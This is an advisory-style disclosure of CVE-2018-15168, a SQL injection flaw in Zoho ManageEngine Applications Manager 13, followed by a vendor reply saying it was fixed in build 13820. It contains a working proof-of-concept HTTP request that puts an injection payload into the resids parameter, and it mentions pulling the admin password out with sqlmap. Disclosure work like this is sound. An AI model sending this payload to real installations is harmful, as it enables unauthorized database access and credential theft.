[CVE-2018-15168]Zoho manageengine Applications Manager SQL Injection vulnerability

[x-f1v3]

Zoho manageengine Applications Manager SQL Injection vulnerability

Date: 2018/07/18
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: jacky.xing@dbappsecurity.com.cn
CVE:CVE-2018-15168

I found a sql injection in the Zoho ManageEngine Applications Manager 13 (13810 build) via the resids parameter in /editDisplaynames.domethod=editDisplaynames&resids=1 GET request.

Proof of Concept:

GET /editDisplaynames.do?method=editDisplaynames&resids=1)%20AND%202410=2410%20AND%20(5744=5744 HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Connection: close

This is a time-based blind SQL Injection vulnerability .So I use sqlmap to exploit it .The following is a proof screenshot.

To get the admin'spassword:

The vendor has fixed the vulnerability：
https://www.manageengine.com/products/applications_manager/issues.html

[Priyankaroy93]

We apologise for the inconvenience this may have caused to our customers.
These issues were fixed in July itself, with the release of version 13820. Please upgrade to the latest version from here: http://bit.ly/APMDownload

ManageEngine